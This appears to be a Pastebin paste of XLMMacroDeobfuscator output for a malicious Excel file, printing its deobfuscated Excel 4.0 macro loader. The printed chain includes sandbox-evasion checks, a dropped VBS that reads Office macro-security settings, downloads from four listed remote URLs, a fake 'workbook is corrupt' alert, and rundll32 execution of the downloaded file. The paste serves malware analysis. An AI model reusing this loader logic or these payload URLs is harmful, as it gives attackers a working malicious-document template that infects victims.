Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- _ _______
- |\ /|( \ ( )
- ( \ / )| ( | () () |
- \ (_) / | | | || || |
- ) _ ( | | | |(_)| |
- / ( ) \ | | | | | |
- ( / \ )| (____/\| ) ( |
- |/ \|(_______/|/ \|
- ______ _______ _______ ______ _______ _______ _______ _______ _________ _______ _______
- ( __ \ ( ____ \( ___ )( ___ \ ( ____ \|\ /|( ____ \( ____ \( ___ )\__ __/( ___ )( ____ )
- | ( \ )| ( \/| ( ) || ( ) )| ( \/| ) ( || ( \/| ( \/| ( ) | ) ( | ( ) || ( )|
- | | ) || (__ | | | || (__/ / | (__ | | | || (_____ | | | (___) | | | | | | || (____)|
- | | | || __) | | | || __ ( | __) | | | |(_____ )| | | ___ | | | | | | || __)
- | | ) || ( | | | || ( \ \ | ( | | | | ) || | | ( ) | | | | | | || (\ (
- | (__/ )| (____/\| (___) || )___) )| ) | (___) |/\____) || (____/\| ) ( | | | | (___) || ) \ \__
- (______/ (_______/(_______)|/ \___/ |/ (_______)\_______)(_______/|/ \| )_( (_______)|/ \__/
- XLMMacroDeobfuscator(v0.1.5) - https://github.com/DissectMalware/XLMMacroDeobfuscator
- File: C:\Users\user\Downloads\746a9efdf92bc2fdbf2f9e4707052c50a7d0d6307afa9339c1a5e10e8d5ebf9d\746a9efdf92bc2fdbf2f9e4707052c50a7d0d6307afa9339c1a5e10e8d5ebf9d.xls
- Unencrypted xls file
- [Loading Cells]
- auto_open: auto_open->'jdOsRgCP7ufKCKrN6H'!$DA$19234
- [Starting Deobfuscation]
- CELL:DA19234 , FullEvaluation , FORMULA("=CHAR(R[-3897]C[150])",jdOsRgCP7ufKCKrN6H$CP$21706:$CP$21786)
- CELL:DA19235 , FullEvaluation , GOTO(jdOsRgCP7ufKCKrN6H!_________)
- CELL:II24421 , FullEvaluation , "=CLOSE(FALSE)"
- CELL:II24422 , FullEvaluation , "=APP.MAXIMIZE()"
- CELL:II24423 , FullEvaluation , "=IF(GET.WINDOW(7),GOTO(R49803C239),)"
- CELL:II24424 , FullEvaluation , "=IF(GET.WINDOW(20),,GOTO(R49803C239))"
- CELL:II24425 , FullEvaluation , "=IF(GET.WINDOW(23)<3,GOTO(R49803C239),)"
- CELL:II24426 , FullEvaluation , "=IF(GET.WORKSPACE(31),GOTO(R49803C239),)"
- CELL:II24427 , FullEvaluation , "=IF(GET.WORKSPACE(13)<770,GOTO(R49803C239),)"
- CELL:II24428 , FullEvaluation , "=IF(GET.WORKSPACE(14)<390,GOTO(R49803C239),)"
- CELL:II24429 , FullEvaluation , "=IF(GET.WORKSPACE(19),,GOTO(R49803C239))"
- CELL:II24430 , FullEvaluation , "=IF(GET.WORKSPACE(42),,GOTO(R49803C239))"
- CELL:II24431 , FullEvaluation , "=IF(ISNUMBER(SEARCH(""Windows"",GET.WORKSPACE(1))),,GOTO(R49803C239))"
- CELL:II24432 , FullEvaluation , "=""C:\Users\Public\yY7LXk5.vbs"""
- CELL:II24433 , FullEvaluation , "=""C:\Users\Public\JFxI6.txt"""
- CELL:II24434 , FullEvaluation , "=FOPEN(R49814C239,3)"
- CELL:II24435 , FullEvaluation , "=FWRITELN(R49816C239,""On Error Resume Next"")"
- CELL:II24436 , FullEvaluation , "=FWRITELN(R49816C239,""Set s61VxxB = CreateObject(""""WScript.Shell"""")"")"
- CELL:II24437 , FullEvaluation , "=FWRITELN(R49816C239,""Set senZg = CreateObject(""""Scripting.FileSystemObject"""")"")"
- CELL:II24438 , FullEvaluation , "=FWRITELN(R49816C239,""Set rwi9e83n = senZg.CreateTextFile(""""""&R49815C239&"""""", True)"")"
- CELL:II24439 , FullEvaluation , "=FWRITELN(R49816C239,""rwi9e83n.WriteLine(s61VxxB.RegRead(""""HKCU\Software\Microsoft\Office\""&GET.WORKSPACE(2)&""\Excel\Security\VBAWarnings""""))"")"
- CELL:II24440 , FullEvaluation , "=FWRITELN(R49816C239,""rwi9e83n.Close"")"
- CELL:II24441 , FullEvaluation , "=FCLOSE(R49816C239)"
- CELL:II24442 , FullEvaluation , "=EXEC(""explorer.exe ""&R49814C239&"""")"
- CELL:II24443 , FullEvaluation , "=WHILE(ISERROR(FILES(R49815C239)))"
- CELL:II24444 , FullEvaluation , "=WAIT(NOW()+""00:00:01"")"
- CELL:II24445 , FullEvaluation , "=NEXT()"
- CELL:II24446 , FullEvaluation , "=FILE.DELETE(R49814C239)"
- CELL:II24447 , FullEvaluation , "=FOPEN(R49815C239,2)"
- CELL:II24448 , FullEvaluation , "=FREAD(R49829C239,100)"
- CELL:II24449 , FullEvaluation , "=FCLOSE(R49829C239)"
- CELL:II24450 , FullEvaluation , "=FILE.DELETE(R49815C239)"
- CELL:II24451 , FullEvaluation , "=IF(ISNUMBER(SEARCH(""1"",R49830C239)),GOTO(R49803C239),)"
- CELL:II24452 , FullEvaluation , "=IF(ISNUMBER(SEARCH(""32"",GET.WORKSPACE(1))),GOTO(R20478C66),GOTO(R142C133))"
- CELL:II24453 , FullEvaluation , GOTO(jdOsRgCP7ufKCKrN6H!_________)
- CELL:AM56374 , FullEvaluation , FORMULA("=FORMULA(R[-31954]C[204],R[-6572]C[200])",jdOsRgCP7ufKCKrN6H$AM$56375:$AM$56406)
- CELL:AM56375 , FullEvaluation , FORMULA("=CLOSE(FALSE)",R[-6572]C[200])
- CELL:AM56376 , FullEvaluation , FORMULA("=APP.MAXIMIZE()",R[-6572]C[200])
- CELL:AM56377 , FullEvaluation , FORMULA("=IF(GET.WINDOW(7),GOTO(R49803C239),)",R[-6572]C[200])
- CELL:AM56378 , FullEvaluation , FORMULA("=IF(GET.WINDOW(20),,GOTO(R49803C239))",R[-6572]C[200])
- CELL:AM56379 , FullEvaluation , FORMULA("=IF(GET.WINDOW(23)<3,GOTO(R49803C239),)",R[-6572]C[200])
- CELL:AM56380 , FullEvaluation , FORMULA("=IF(GET.WORKSPACE(31),GOTO(R49803C239),)",R[-6572]C[200])
- CELL:AM56381 , FullEvaluation , FORMULA("=IF(GET.WORKSPACE(13)<770,GOTO(R49803C239),)",R[-6572]C[200])
- CELL:AM56382 , FullEvaluation , FORMULA("=IF(GET.WORKSPACE(14)<390,GOTO(R49803C239),)",R[-6572]C[200])
- CELL:AM56383 , FullEvaluation , FORMULA("=IF(GET.WORKSPACE(19),,GOTO(R49803C239))",R[-6572]C[200])
- CELL:AM56384 , FullEvaluation , FORMULA("=IF(GET.WORKSPACE(42),,GOTO(R49803C239))",R[-6572]C[200])
- CELL:AM56385 , FullEvaluation , FORMULA("=IF(ISNUMBER(SEARCH(""Windows"",GET.WORKSPACE(1))),,GOTO(R49803C239))",R[-6572]C[200])
- CELL:AM56386 , FullEvaluation , FORMULA("=""C:\Users\Public\yY7LXk5.vbs""",R[-6572]C[200])
- CELL:AM56387 , FullEvaluation , FORMULA("=""C:\Users\Public\JFxI6.txt""",R[-6572]C[200])
- CELL:AM56388 , FullEvaluation , FORMULA("=FOPEN(R49814C239,3)",R[-6572]C[200])
- CELL:AM56389 , FullEvaluation , FORMULA("=FWRITELN(R49816C239,""On Error Resume Next"")",R[-6572]C[200])
- CELL:AM56390 , FullEvaluation , FORMULA("=FWRITELN(R49816C239,""Set s61VxxB = CreateObject(""""WScript.Shell"""")"")",R[-6572]C[200])
- CELL:AM56391 , FullEvaluation , FORMULA("=FWRITELN(R49816C239,""Set senZg = CreateObject(""""Scripting.FileSystemObject"""")"")",R[-6572]C[200])
- CELL:AM56392 , FullEvaluation , FORMULA("=FWRITELN(R49816C239,""Set rwi9e83n = senZg.CreateTextFile(""""""&R49815C239&"""""", True)"")",R[-6572]C[200])
- CELL:AM56393 , FullEvaluation , FORMULA("=FWRITELN(R49816C239,""rwi9e83n.WriteLine(s61VxxB.RegRead(""""HKCU\Software\Microsoft\Office\""&GET.WORKSPACE(2)&""\Excel\Security\VBAWarnings""""))"")",R[-6572]C[200])
- CELL:AM56394 , FullEvaluation , FORMULA("=FWRITELN(R49816C239,""rwi9e83n.Close"")",R[-6572]C[200])
- CELL:AM56395 , FullEvaluation , FORMULA("=FCLOSE(R49816C239)",R[-6572]C[200])
- CELL:AM56396 , FullEvaluation , FORMULA("=EXEC(""explorer.exe ""&R49814C239&"""")",R[-6572]C[200])
- CELL:AM56397 , FullEvaluation , FORMULA("=WHILE(ISERROR(FILES(R49815C239)))",R[-6572]C[200])
- CELL:AM56398 , FullEvaluation , FORMULA("=WAIT(NOW()+""00:00:01"")",R[-6572]C[200])
- CELL:AM56399 , FullEvaluation , FORMULA("=NEXT()",R[-6572]C[200])
- CELL:AM56400 , FullEvaluation , FORMULA("=FILE.DELETE(R49814C239)",R[-6572]C[200])
- CELL:AM56401 , FullEvaluation , FORMULA("=FOPEN(R49815C239,2)",R[-6572]C[200])
- CELL:AM56402 , FullEvaluation , FORMULA("=FREAD(R49829C239,100)",R[-6572]C[200])
- CELL:AM56403 , FullEvaluation , FORMULA("=FCLOSE(R49829C239)",R[-6572]C[200])
- CELL:AM56404 , FullEvaluation , FORMULA("=FILE.DELETE(R49815C239)",R[-6572]C[200])
- CELL:AM56405 , FullEvaluation , FORMULA("=IF(ISNUMBER(SEARCH(""1"",R49830C239)),GOTO(R49803C239),)",R[-6572]C[200])
- CELL:AM56406 , FullEvaluation , FORMULA("=IF(ISNUMBER(SEARCH(""32"",GET.WORKSPACE(1))),GOTO(R20478C66),GOTO(R142C133))",R[-6572]C[200])
- CELL:AM56407 , FullEvaluation , GOTO(jdOsRgCP7ufKCKrN6H!_________)
- CELL:IE49804 , PartialEvaluation , APP.MAXIMIZE()
- CELL:IE49805 , FullEvaluation , IF(GET.WINDOW(7),GOTO(R49803C239),)
- CELL:IE49806 , FullEvaluation , IF(GET.WINDOW(20),,GOTO(R49803C239))
- CELL:IE49807 , FullEvaluation , IF(GET.WINDOW(23)<3,GOTO(R49803C239),)
- CELL:IE49808 , FullEvaluation , IF(GET.WORKSPACE(31),GOTO(R49803C239),)
- CELL:IE49809 , FullEvaluation , IF(GET.WORKSPACE(13)<770,GOTO(R49803C239),)
- CELL:IE49810 , FullEvaluation , IF(GET.WORKSPACE(14)<390,GOTO(R49803C239),)
- CELL:IE49811 , FullEvaluation , IF(GET.WORKSPACE(19),,GOTO(R49803C239))
- CELL:IE49812 , FullEvaluation , IF(GET.WORKSPACE(42),,GOTO(R49803C239))
- CELL:IE49813 , FullBranching , IF(ISNUMBER(SEARCH("Windows",GET.WORKSPACE(1))),,GOTO(R49803C239))
- CELL:IE49813 , FullEvaluation , [TRUE]
- CELL:IE49814 , FullEvaluation , "C:\Users\Public\yY7LXk5.vbs"
- CELL:IE49815 , FullEvaluation , "C:\Users\Public\JFxI6.txt"
- CELL:IE49816 , PartialEvaluation , FOPEN("C:\Users\Public\yY7LXk5.vbs",3)
- CELL:IE49817 , PartialEvaluation , FWRITELN("FOPEN(""C:\Users\Public\yY7LXk5.vbs"",3)","On Error Resume Next")
- CELL:IE49818 , PartialEvaluation , FWRITELN("FOPEN(""C:\Users\Public\yY7LXk5.vbs"",3)","Set s61VxxB = CreateObject(""WScript.Shell"")")
- CELL:IE49819 , PartialEvaluation , FWRITELN("FOPEN(""C:\Users\Public\yY7LXk5.vbs"",3)","Set senZg = CreateObject(""Scripting.FileSystemObject"")")
- CELL:IE49820 , PartialEvaluation , FWRITELN("FOPEN(""C:\Users\Public\yY7LXk5.vbs"",3)","Set rwi9e83n = senZg.CreateTextFile(""C:\Users\Public\JFxI6.txt"", True)")
- CELL:IE49821 , PartialEvaluation , FWRITELN("FOPEN(""C:\Users\Public\yY7LXk5.vbs"",3)","rwi9e83n.WriteLine(s61VxxB.RegRead(""HKCU\Software\Microsoft\Office\GET.WORKSPACE(2)\Excel\Security\VBAWarnings""))")
- CELL:IE49822 , PartialEvaluation , FWRITELN("FOPEN(""C:\Users\Public\yY7LXk5.vbs"",3)","rwi9e83n.Close")
- CELL:IE49823 , PartialEvaluation , FCLOSE("FOPEN(""C:\Users\Public\yY7LXk5.vbs"",3)")
- CELL:IE49824 , PartialEvaluation , EXEC("explorer.exe C:\Users\Public\yY7LXk5.vbs")
- CELL:IE49825 , PartialEvaluation , WHILE(ISERROR(FILES(R49815C239)))
- CELL:IE49828 , PartialEvaluation , FILE.DELETE("C:\Users\Public\yY7LXk5.vbs")
- CELL:IE49829 , PartialEvaluation , FOPEN("C:\Users\Public\JFxI6.txt",2)
- CELL:IE49830 , PartialEvaluation , FREAD("FOPEN(""C:\Users\Public\JFxI6.txt"",2)",100)
- CELL:IE49831 , PartialEvaluation , FCLOSE("FOPEN(""C:\Users\Public\JFxI6.txt"",2)")
- CELL:IE49832 , PartialEvaluation , FILE.DELETE("C:\Users\Public\JFxI6.txt")
- CELL:IE49833 , FullBranching , IF(ISNUMBER(SEARCH("1",R49830C239)),GOTO(R49803C239),)
- CELL:IE49833 , FullEvaluation , [TRUE] GOTO(R49803C239)
- CELL:IE49803 , End , CLOSE(FALSE)
- CELL:IE49833 , FullEvaluation , [FALSE]
- CELL:IE49834 , FullBranching , IF(ISNUMBER(SEARCH("32",GET.WORKSPACE(1))),GOTO(R20478C66),GOTO(R142C133))
- CELL:IE49834 , FullEvaluation , [TRUE] GOTO(R20478C66)
- CELL:BN20478 , FullEvaluation , "=""C:\Users\Public\rVuj5bF.html"""
- CELL:BN20479 , FullEvaluation , "=""https://wireborg.com/wp-keys.php"""
- CELL:BN20480 , FullEvaluation , "=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R38078C223,R38077C223,0,0)"
- CELL:BN20481 , FullEvaluation , "=FILES(R38077C223)"
- CELL:BN20482 , FullEvaluation , "=IF(ISERROR(R38080C223),GOTO(R38087C223),)"
- CELL:BN20483 , FullEvaluation , "=FOPEN(R38077C223)"
- CELL:BN20484 , FullEvaluation , "=FSIZE(R38082C223)"
- CELL:BN20485 , FullEvaluation , "=FCLOSE(R38082C223)"
- CELL:BN20486 , FullEvaluation , "=IF(R38083C223<40000,,GOTO(R38104C223))"
- CELL:BN20487 , FullEvaluation , "=""http://zmedia.shwetech.com/wp-keys.php"""
- CELL:BN20488 , FullEvaluation , "=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R38086C223,R38077C223,0,0)"
- CELL:BN20489 , FullEvaluation , "=FILES(R38077C223)"
- CELL:BN20490 , FullEvaluation , "=IF(ISERROR(R38088C223),GOTO(R38095C223),)"
- CELL:BN20491 , FullEvaluation , "=FOPEN(R38077C223)"
- CELL:BN20492 , FullEvaluation , "=FSIZE(R38090C223)"
- CELL:BN20493 , FullEvaluation , "=FCLOSE(R38090C223)"
- CELL:BN20494 , FullEvaluation , "=IF(R38091C223<40000,,GOTO(R38104C223))"
- CELL:BN20495 , FullEvaluation , "=""https://datalibacbi.ml/wp-keys.php"""
- CELL:BN20496 , FullEvaluation , "=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R38094C223,R38077C223,0,0)"
- CELL:BN20497 , FullEvaluation , "=FILES(R38077C223)"
- CELL:BN20498 , FullEvaluation , "=IF(ISERROR(R38096C223),GOTO(R38103C223),)"
- CELL:BN20499 , FullEvaluation , "=FOPEN(R38077C223)"
- CELL:BN20500 , FullEvaluation , "=FSIZE(R38098C223)"
- CELL:BN20501 , FullEvaluation , "=FCLOSE(R38098C223)"
- CELL:BN20502 , FullEvaluation , "=IF(R38099C223<40000,,GOTO(R38104C223))"
- CELL:BN20503 , FullEvaluation , "=""https://procacardenla.ga/wp-keys.php"""
- CELL:BN20504 , FullEvaluation , "=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R38102C223,R38077C223,0,0)"
- CELL:BN20505 , FullEvaluation , "=""The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt."""
- CELL:BN20506 , FullEvaluation , "=ALERT(R38104C223)"
- CELL:BN20507 , FullEvaluation , "=""C:\Windows\system32\rundll32.exe"""
- CELL:BN20508 , FullEvaluation , "=R38077C223&"",DllRegisterServer"""
- CELL:BN20509 , FullEvaluation , "=CALL(""Shell32"",""ShellExecuteA"",""JJCCCJJ"",0,""open"",R38106C223,R38107C223,0,5)"
- CELL:BN20510 , FullEvaluation , "=GOTO(R49803C239)"
- CELL:BN20511 , FullEvaluation , GOTO(jdOsRgCP7ufKCKrN6H!_________)
- CELL:FR55133 , FullEvaluation , FORMULA("=FORMULA(R[-34656]C[-108],R[-17057]C[49])",jdOsRgCP7ufKCKrN6H$FR$55134:$FR$55166)
- CELL:FR55134 , FullEvaluation , FORMULA("=""C:\Users\Public\rVuj5bF.html""",R[-17057]C[49])
- CELL:FR55135 , FullEvaluation , FORMULA("=""https://wireborg.com/wp-keys.php""",R[-17057]C[49])
- CELL:FR55136 , FullEvaluation , FORMULA("=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R38078C223,R38077C223,0,0)",R[-17057]C[49])
- CELL:FR55137 , FullEvaluation , FORMULA("=FILES(R38077C223)",R[-17057]C[49])
- CELL:FR55138 , FullEvaluation , FORMULA("=IF(ISERROR(R38080C223),GOTO(R38087C223),)",R[-17057]C[49])
- CELL:FR55139 , FullEvaluation , FORMULA("=FOPEN(R38077C223)",R[-17057]C[49])
- CELL:FR55140 , FullEvaluation , FORMULA("=FSIZE(R38082C223)",R[-17057]C[49])
- CELL:FR55141 , FullEvaluation , FORMULA("=FCLOSE(R38082C223)",R[-17057]C[49])
- CELL:FR55142 , FullEvaluation , FORMULA("=IF(R38083C223<40000,,GOTO(R38104C223))",R[-17057]C[49])
- CELL:FR55143 , FullEvaluation , FORMULA("=""http://zmedia.shwetech.com/wp-keys.php""",R[-17057]C[49])
- CELL:FR55144 , FullEvaluation , FORMULA("=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R38086C223,R38077C223,0,0)",R[-17057]C[49])
- CELL:FR55145 , FullEvaluation , FORMULA("=FILES(R38077C223)",R[-17057]C[49])
- CELL:FR55146 , FullEvaluation , FORMULA("=IF(ISERROR(R38088C223),GOTO(R38095C223),)",R[-17057]C[49])
- CELL:FR55147 , FullEvaluation , FORMULA("=FOPEN(R38077C223)",R[-17057]C[49])
- CELL:FR55148 , FullEvaluation , FORMULA("=FSIZE(R38090C223)",R[-17057]C[49])
- CELL:FR55149 , FullEvaluation , FORMULA("=FCLOSE(R38090C223)",R[-17057]C[49])
- CELL:FR55150 , FullEvaluation , FORMULA("=IF(R38091C223<40000,,GOTO(R38104C223))",R[-17057]C[49])
- CELL:FR55151 , FullEvaluation , FORMULA("=""https://datalibacbi.ml/wp-keys.php""",R[-17057]C[49])
- CELL:FR55152 , FullEvaluation , FORMULA("=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R38094C223,R38077C223,0,0)",R[-17057]C[49])
- CELL:FR55153 , FullEvaluation , FORMULA("=FILES(R38077C223)",R[-17057]C[49])
- CELL:FR55154 , FullEvaluation , FORMULA("=IF(ISERROR(R38096C223),GOTO(R38103C223),)",R[-17057]C[49])
- CELL:FR55155 , FullEvaluation , FORMULA("=FOPEN(R38077C223)",R[-17057]C[49])
- CELL:FR55156 , FullEvaluation , FORMULA("=FSIZE(R38098C223)",R[-17057]C[49])
- CELL:FR55157 , FullEvaluation , FORMULA("=FCLOSE(R38098C223)",R[-17057]C[49])
- CELL:FR55158 , FullEvaluation , FORMULA("=IF(R38099C223<40000,,GOTO(R38104C223))",R[-17057]C[49])
- CELL:FR55159 , FullEvaluation , FORMULA("=""https://procacardenla.ga/wp-keys.php""",R[-17057]C[49])
- CELL:FR55160 , FullEvaluation , FORMULA("=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R38102C223,R38077C223,0,0)",R[-17057]C[49])
- CELL:FR55161 , FullEvaluation , FORMULA("=""The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.""",R[-17057]C[49])
- CELL:FR55162 , FullEvaluation , FORMULA("=ALERT(R38104C223)",R[-17057]C[49])
- CELL:FR55163 , FullEvaluation , FORMULA("=""C:\Windows\system32\rundll32.exe""",R[-17057]C[49])
- CELL:FR55164 , FullEvaluation , FORMULA("=R38077C223&"",DllRegisterServer""",R[-17057]C[49])
- CELL:FR55165 , FullEvaluation , FORMULA("=CALL(""Shell32"",""ShellExecuteA"",""JJCCCJJ"",0,""open"",R38106C223,R38107C223,0,5)",R[-17057]C[49])
- CELL:FR55166 , FullEvaluation , FORMULA("=GOTO(R49803C239)",R[-17057]C[49])
- CELL:FR55167 , FullEvaluation , GOTO(jdOsRgCP7ufKCKrN6H!_________)
- CELL:HO38077 , FullEvaluation , "C:\Users\Public\rVuj5bF.html"
- CELL:HO38078 , FullEvaluation , "https://wireborg.com/wp-keys.php"
- CELL:HO38079 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://wireborg.com/wp-keys.php","C:\Users\Public\rVuj5bF.html",0,0)
- CELL:HO38080 , PartialEvaluation , FILES("C:\Users\Public\rVuj5bF.html")
- CELL:HO38081 , FullBranching , IF(ISERROR(R38080C223),GOTO(R38087C223),)
- CELL:HO38081 , FullEvaluation , [TRUE] GOTO(R38087C223)
- CELL:HO38087 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"http://zmedia.shwetech.com/wp-keys.php","C:\Users\Public\rVuj5bF.html",0,0)
- CELL:HO38088 , PartialEvaluation , FILES("C:\Users\Public\rVuj5bF.html")
- CELL:HO38089 , FullBranching , IF(ISERROR(R38088C223),GOTO(R38095C223),)
- CELL:HO38089 , FullEvaluation , [TRUE] GOTO(R38095C223)
- CELL:HO38095 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://datalibacbi.ml/wp-keys.php","C:\Users\Public\rVuj5bF.html",0,0)
- CELL:HO38096 , PartialEvaluation , FILES("C:\Users\Public\rVuj5bF.html")
- CELL:HO38097 , FullBranching , IF(ISERROR(R38096C223),GOTO(R38103C223),)
- CELL:HO38097 , FullEvaluation , [TRUE] GOTO(R38103C223)
- CELL:HO38103 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://procacardenla.ga/wp-keys.php","C:\Users\Public\rVuj5bF.html",0,0)
- CELL:HO38104 , FullEvaluation , "The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt."
- CELL:HO38105 , PartialEvaluation , ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.")
- CELL:HO38106 , FullEvaluation , "C:\Windows\system32\rundll32.exe"
- CELL:HO38107 , FullEvaluation , "C:\Users\Public\rVuj5bF.html,DllRegisterServer"
- CELL:HO38108 , FullEvaluation , CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\rundll32.exe","C:\Users\Public\rVuj5bF.html,DllRegisterServer",0,5)
- CELL:HO38109 , FullEvaluation , GOTO(R49803C239)
- CELL:IE49803 , End , CLOSE(FALSE)
- CELL:HO38097 , FullEvaluation , [FALSE]
- CELL:HO38098 , PartialEvaluation , FOPEN("C:\Users\Public\rVuj5bF.html")
- CELL:HO38099 , PartialEvaluation , FSIZE("FOPEN(""C:\Users\Public\rVuj5bF.html"")")
- CELL:HO38100 , PartialEvaluation , FCLOSE("FOPEN(""C:\Users\Public\rVuj5bF.html"")")
- CELL:HO38101 , FullEvaluation , IF(R38099C223<40000,,GOTO(R38104C223))
- CELL:HO38102 , FullEvaluation , "https://procacardenla.ga/wp-keys.php"
- CELL:HO38103 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://procacardenla.ga/wp-keys.php","C:\Users\Public\rVuj5bF.html",0,0)
- CELL:HO38104 , FullEvaluation , "The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt."
- CELL:HO38105 , PartialEvaluation , ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.")
- CELL:HO38106 , FullEvaluation , "C:\Windows\system32\rundll32.exe"
- CELL:HO38107 , FullEvaluation , "C:\Users\Public\rVuj5bF.html,DllRegisterServer"
- CELL:HO38108 , FullEvaluation , CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\rundll32.exe","C:\Users\Public\rVuj5bF.html,DllRegisterServer",0,5)
- CELL:HO38109 , FullEvaluation , GOTO(R49803C239)
- CELL:IE49803 , End , CLOSE(FALSE)
- CELL:HO38089 , FullEvaluation , [FALSE]
- CELL:HO38090 , PartialEvaluation , FOPEN("C:\Users\Public\rVuj5bF.html")
- CELL:HO38091 , PartialEvaluation , FSIZE("FOPEN(""C:\Users\Public\rVuj5bF.html"")")
- CELL:HO38092 , PartialEvaluation , FCLOSE("FOPEN(""C:\Users\Public\rVuj5bF.html"")")
- CELL:HO38093 , FullEvaluation , IF(R38091C223<40000,,GOTO(R38104C223))
- CELL:HO38094 , FullEvaluation , "https://datalibacbi.ml/wp-keys.php"
- CELL:HO38095 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://datalibacbi.ml/wp-keys.php","C:\Users\Public\rVuj5bF.html",0,0)
- CELL:HO38096 , PartialEvaluation , FILES("C:\Users\Public\rVuj5bF.html")
- CELL:HO38097 , FullBranching , IF(ISERROR(R38096C223),GOTO(R38103C223),)
- CELL:HO38097 , FullEvaluation , [TRUE] GOTO(R38103C223)
- CELL:HO38103 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://procacardenla.ga/wp-keys.php","C:\Users\Public\rVuj5bF.html",0,0)
- CELL:HO38104 , FullEvaluation , "The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt."
- CELL:HO38105 , PartialEvaluation , ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.")
- CELL:HO38106 , FullEvaluation , "C:\Windows\system32\rundll32.exe"
- CELL:HO38107 , FullEvaluation , "C:\Users\Public\rVuj5bF.html,DllRegisterServer"
- CELL:HO38097 , FullEvaluation , [FALSE]
- CELL:HO38098 , PartialEvaluation , FOPEN("C:\Users\Public\rVuj5bF.html")
- CELL:HO38099 , PartialEvaluation , FSIZE("FOPEN(""C:\Users\Public\rVuj5bF.html"")")
- CELL:HO38100 , PartialEvaluation , FCLOSE("FOPEN(""C:\Users\Public\rVuj5bF.html"")")
- CELL:HO38101 , FullEvaluation , IF(R38099C223<40000,,GOTO(R38104C223))
- CELL:HO38102 , FullEvaluation , "https://procacardenla.ga/wp-keys.php"
- CELL:HO38103 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://procacardenla.ga/wp-keys.php","C:\Users\Public\rVuj5bF.html",0,0)
- CELL:HO38104 , FullEvaluation , "The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt."
- CELL:HO38105 , PartialEvaluation , ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.")
- CELL:HO38081 , FullEvaluation , [FALSE]
- CELL:HO38082 , PartialEvaluation , FOPEN("C:\Users\Public\rVuj5bF.html")
- CELL:HO38083 , PartialEvaluation , FSIZE("FOPEN(""C:\Users\Public\rVuj5bF.html"")")
- CELL:HO38084 , PartialEvaluation , FCLOSE("FOPEN(""C:\Users\Public\rVuj5bF.html"")")
- CELL:HO38085 , FullEvaluation , IF(R38083C223<40000,,GOTO(R38104C223))
- CELL:HO38086 , FullEvaluation , "http://zmedia.shwetech.com/wp-keys.php"
- CELL:HO38087 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"http://zmedia.shwetech.com/wp-keys.php","C:\Users\Public\rVuj5bF.html",0,0)
- CELL:HO38088 , PartialEvaluation , FILES("C:\Users\Public\rVuj5bF.html")
- CELL:HO38089 , FullBranching , IF(ISERROR(R38088C223),GOTO(R38095C223),)
- CELL:HO38089 , FullEvaluation , [TRUE] GOTO(R38095C223)
- CELL:HO38095 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://datalibacbi.ml/wp-keys.php","C:\Users\Public\rVuj5bF.html",0,0)
- CELL:HO38096 , PartialEvaluation , FILES("C:\Users\Public\rVuj5bF.html")
- CELL:HO38097 , FullBranching , IF(ISERROR(R38096C223),GOTO(R38103C223),)
- CELL:HO38097 , FullEvaluation , [TRUE] GOTO(R38103C223)
- CELL:HO38103 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://procacardenla.ga/wp-keys.php","C:\Users\Public\rVuj5bF.html",0,0)
- CELL:HO38097 , FullEvaluation , [FALSE]
- CELL:HO38098 , PartialEvaluation , FOPEN("C:\Users\Public\rVuj5bF.html")
- CELL:HO38099 , PartialEvaluation , FSIZE("FOPEN(""C:\Users\Public\rVuj5bF.html"")")
- CELL:HO38100 , PartialEvaluation , FCLOSE("FOPEN(""C:\Users\Public\rVuj5bF.html"")")
- CELL:HO38101 , FullEvaluation , IF(R38099C223<40000,,GOTO(R38104C223))
- CELL:HO38102 , FullEvaluation , "https://procacardenla.ga/wp-keys.php"
- CELL:HO38103 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://procacardenla.ga/wp-keys.php","C:\Users\Public\rVuj5bF.html",0,0)
- CELL:HO38104 , FullEvaluation , "The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt."
- CELL:HO38105 , PartialEvaluation , ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.")
- CELL:HO38089 , FullEvaluation , [FALSE]
- CELL:HO38090 , PartialEvaluation , FOPEN("C:\Users\Public\rVuj5bF.html")
- CELL:HO38091 , PartialEvaluation , FSIZE("FOPEN(""C:\Users\Public\rVuj5bF.html"")")
- CELL:HO38092 , PartialEvaluation , FCLOSE("FOPEN(""C:\Users\Public\rVuj5bF.html"")")
